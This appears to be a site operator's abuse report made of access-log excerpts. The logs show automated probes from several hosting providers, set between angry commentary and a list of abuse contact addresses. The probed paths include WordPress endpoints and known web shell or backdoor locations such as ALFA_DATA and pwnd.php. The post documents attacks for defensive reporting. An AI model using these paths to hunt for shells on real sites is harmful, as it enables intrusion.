196.251.85.75 website.*.com – – [11/Oct/2025:03:19:19 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:19 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:19 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:19 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:20 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:20 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:20 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
+
+
196.251.86.100 website.*.com – – [12/Oct/2025:22:04:28 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.86.100 website.*.com – – [12/Oct/2025:22:04:28 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.86.100 website.*.com – – [12/Oct/2025:22:04:28 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.86.100 website.*.com – – [12/Oct/2025:22:04:28 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.86.100 website.*.com – – [12/Oct/2025:22:04:28 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.86.100 website.*.com – – [12/Oct/2025:22:04:34 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS60068 – Datacamp Limited – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IPS!!!
ONLY 1 AUTOMATIC ANSWER!!! WE REPORT THIS SINCE SOME DAYS! THIS PROVIDER DOES NOTHING!!!
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:27 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:27 +0200] „GET /images/class-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:27 +0200] „GET /wp-content/1.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:27 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:27 +0200] „GET /wp-content/themes/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:28 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:28 +0200] „GET /text.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:28 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:28 +0200] „GET /function/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:29 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:29 +0200] „GET /wp-admin/css/about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:29 +0200] „GET /tinyfilemanager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:29 +0200] „GET /contact.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:29 +0200] „GET /wp-content/themes/pridmag/db.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:29 +0200] „GET /ws.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:30 +0200] „GET /file/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
156.146.56.131 website.*.com – – [11/Oct/2025:04:07:30 +0200] „GET /wp-2019.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
… and so on… and so on!!! – VERY UNSECURE PROVIDER!!!
+
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:45 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:45 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:45 +0200] „GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:45 +0200] „GET /wp-includes/blocks/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:46 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:46 +0200] „GET /user.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:46 +0200] „GET /wp-includes/wp-class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:46 +0200] „GET /ty.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:46 +0200] „GET /upload.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:47 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
156.146.56.133 website.*.com – – [11/Oct/2025:04:07:47 +0200] „GET /tiny.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
… and so on… and so on!!! – VERY UNSECURE PROVIDER!!!

ABUSE-MAIL NR. 2 – WEEKEND!

abuse@datacamp.co.uk,ip.abuse@ril.com,google-cloud-compliance@google.com, network-abuse@google.com

AS55836 – Reliance Jio Infocomm Limited – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
49.47.154.124 website.*.com – – [11/Oct/2025:10:16:20 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; x86) AppleWebKit/537.36 (KHTML, like Gecko) Opera/73.0.0.0 Safari/537.36“

AS396982 – Google LLC – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:53 +0200] „HEAD /us HTTP/1.0“ 403 – „http://www.website.*.com/us/“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:53 +0200] „HEAD /portal HTTP/1.0“ 403 – „http://www.website.*.com/portal/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Edg/125.0.2535.51“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:53 +0200] „HEAD /blog HTTP/1.0“ 403 – „http://www.website.*.com/blog/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.20 Safari/537.36“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:53 +0200] „HEAD /main HTTP/1.0“ 403 – „http://www.website.*.com/main/“ „Mozilla/5.0 (Linux; Android 12; CPH2381) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.163 Mobile Safari/537.36 OPR/76.3.4027.73374“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:54 +0200] „HEAD /new HTTP/1.0“ 403 – „http://www.website.*.com/new/“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:54 +0200] „HEAD /2023 HTTP/1.0“ 403 – „http://www.website.*.com/2023/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6280.88 Safari/537.36“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:54 +0200] „HEAD /site1 HTTP/1.0“ 403 – „http://www.website.*.com/site1/“ „Mozilla/5.0 (Linux; Android 12; CPH2381) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.163 Mobile Safari/537.36 OPR/76.3.4027.73374“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:54 +0200] „HEAD /blog2 HTTP/1.0“ 403 – „http://www.website.*.com/blog2/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Edg/125.0.2535.51“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:55 +0200] „HEAD /old HTTP/1.0“ 403 – „http://www.website.*.com/old/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6280.88 Safari/537.36“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:55 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „http://www.website.*.com/wordpress/“ „Mozilla/5.0 (Linux; U; Android 11; en-US; V2027) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 UCBrowser/13.4.0.1306 Mobile Safari/537.36“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:55 +0200] „HEAD /en HTTP/1.0“ 403 – „http://www.website.*.com/en/“ „Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:55 +0200] „HEAD /press HTTP/1.0“ 403 – „http://www.website.*.com/press/“ „Mozilla/5.0 (Linux; U; Android 11; en-US; V2027) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 UCBrowser/13.4.0.1306 Mobile Safari/537.36“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:56 +0200] „HEAD /2024 HTTP/1.0“ 403 – „http://www.website.*.com/2024/“ „Mozilla/5.0 (Android 13; Mobile; rv:124.0) Gecko/124.0 Firefox/124.0“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:56 +0200] „HEAD /news HTTP/1.0“ 403 – „http://www.website.*.com/news/“ „Mozilla/5.0 (Android 13; Mobile; rv:124.0) Gecko/124.0 Firefox/124.0“
34.55.220.161 website.*.com – – [11/Oct/2025:21:38:56 +0200] „HEAD /site HTTP/1.0“ 403 – „http://www.website.*.com/site/“ „Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.56 Mobile Safari/537.36“
… and so on… and so on!!! VERY UNSECURE PROVIDER!
+
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:07 +0200] „HEAD /old/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:07 +0200] „HEAD /blog/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:07 +0200] „HEAD /main/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/124.0.6367.56 Mobile/15E148 Safari/604.1“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:07 +0200] „HEAD /de/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:08 +0200] „HEAD /2024/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:08 +0200] „HEAD /blog2/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:08 +0200] „HEAD /2023/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 12; CPH2381) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.163 Mobile Safari/537.36 OPR/76.3.4027.73374“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:08 +0200] „HEAD /site/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0“
34.148.66.252 website.*.com – – [12/Oct/2025:07:07:08 +0200] „HEAD /en/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1“
… and so on… and so on!!! VERY UNSECURE PROVIDER!

AS60068 – Datacamp Limited – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL NR. 2!!! – HERE WITH 2 IPS!!!
ONLY 1 AUTOMATIC ANSWER!!! WE REPORT THIS SINCE SOME DAYS! THIS PROVIDER DOES NOTHING!!!
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:49 +0200] „GET /wp-includes/assets/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:49 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:49 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:49 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:50 +0200] „GET /wp-content/themes/twentytwenty/404.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:50 +0200] „GET /wp-includes/ID3/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:50 +0200] „GET /ioxi002.PhP7 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:50 +0200] „GET /wp-admin/network/admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:50 +0200] „GET /profile.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:50 +0200] „GET /users.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:51 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:51 +0200] „GET /v.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:51 +0200] „GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:51 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
149.88.106.163 website.*.com – – [11/Oct/2025:04:07:52 +0200] „GET /a.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
… and so on… and so on!!! – VERY UNSECURE PROVIDER!!!
+
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:07 +0200] „GET /install.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:08 +0200] „GET /ff2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:08 +0200] „GET /admin/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:08 +0200] „GET /w.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:08 +0200] „GET /.alf.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:08 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:09 +0200] „GET /system.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:09 +0200] „GET /wp-includes/theme-compat/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:09 +0200] „GET /file-manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:09 +0200] „GET /wp-content/themes/sketch/404.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:09 +0200] „GET /wp-content/plugins/not/includes/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:10 +0200] „GET /wp-includes/wp-load.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:10 +0200] „GET /cgi-bin/xmrlpc.php HTTP/1.0“ 404 16 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:10 +0200] „GET /f.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:10 +0200] „GET /wp-admin/maint/users.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:10 +0200] „GET /classsmtps.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:10 +0200] „GET /ja.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
